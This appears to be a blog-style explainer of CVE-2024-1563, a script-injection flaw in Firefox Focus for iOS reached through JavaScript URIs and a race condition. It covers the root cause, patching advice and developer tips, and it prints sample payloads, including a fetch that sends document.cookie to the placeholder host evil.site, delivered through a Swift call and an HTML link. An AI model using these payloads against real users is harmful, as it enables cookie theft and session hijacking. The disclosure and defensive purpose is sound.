A newly disclosed vulnerability, CVE-2024-1563, was discovered in Mozilla’s Firefox Focus browser for iOS versions prior to 122. This security flaw allows attackers to execute unauthorized scripts on high-privilege websites (top origin sites) by abusing JavaScript URIs and exploiting a timing (race) condition. This long read will break down how the exploit works, provide code snippets, and share references – all explained in simple terms.

What is CVE-2024-1563?

CVE-2024-1563 is a vulnerability where an attacker could trick Firefox Focus (iOS <122) into running JavaScript code on websites you visit, without your consent. This was made possible by:

Racing against how the app handled URLs with a slight delay (timeout race)

This allowed bypassing the usual security restrictions.

Here’s how the exploit chain works in a step-by-step cycle

1. Attacker crafts a JavaScript URI (e.g. javascript:fetch("https://evil.site/steal?cookie="; + document.cookie))
2. External app or website triggers Firefox Focus to open this URI using a custom scheme (firefox://open-url?...)

Race condition allows execution of the script *before* the security checks block it.

4. Malicious code runs as if loaded by a trusted website—potentially stealing cookies or sensitive info.

Exploitation Details

Attack prerequisite:
User must have Firefox Focus installed and be tricked into clicking a malicious link or opening a bad app.

Attackers can abuse a custom URL scheme like

// Sample Objective-C/Swift/iOS code in a malicious app
let targetURL = "firefox://open-url?url=javascript:fetch('https://evil.site/grab?d='+document.cookie)"
if let url = URL(string: targetURL) {
    UIApplication.shared.open(url, options: [:], completionHandler: nil)
}

On a web page, attackers might use

<!-- Malicious link that launches Firefox Focus with the JavaScript URI -->
<a href="firefox://open-url?url=javascript:alert(document.domain)">Open in Firefox Focus</a>

What happens:
The JavaScript in the URI (alert(document.domain) here) could execute in the context of the last website the user visited, leaking info.

Technical Root Cause

1. Custom URL Scheme: Firefox Focus for iOS registered custom schemes (like firefox://open-url), which external apps/websites can use.
2. JavaScript URI: javascript: URLs are supposed to be unsafe when loaded externally. Focus missed rejecting these in certain conditions.
3. Timeout Race: There was a timing gap between checking the type of URL and blocking malicious ones, during which scripts could run.

Fixing the timing issues and race conditions in URL handling.

Upgrade Now:
If you use Firefox Focus for iOS, update to version 122 or higher to stay safe.

This vulnerability was handled by Mozilla’s Security Team. See the official advisory

- Mozilla Foundation Security Advisory 2024-17

References

- NVD Entry for CVE-2024-1563
- Mozilla’s GitHub Repository
- Exploring Custom Scheme Attacks (External link)

Key Takeaways

- Don’t open untrusted links in Focus or any browser from external apps, especially if running older versions.
- Developers: Always sanitize and validate external URIs, including proper blocking of JavaScript URIs.

Conclusion

CVE-2024-1563 demonstrates how a small oversight in URL scheme handling and timing checks can open the door to serious attacks—even on privacy-focused browsers like Firefox Focus. By keeping software updated and understanding these flaws, users and developers can help keep the web a safer place.


*Whether you’re a digital native or casual user, stay alert to app updates and be cautious about opening links from unknown sources. This is how you defend yourself against silent threats like CVE-2024-1563.*

Timeline

Published on: 02/22/2024 15:15:08 UTC
Last modified on: 01/28/2025 17:39:20 UTC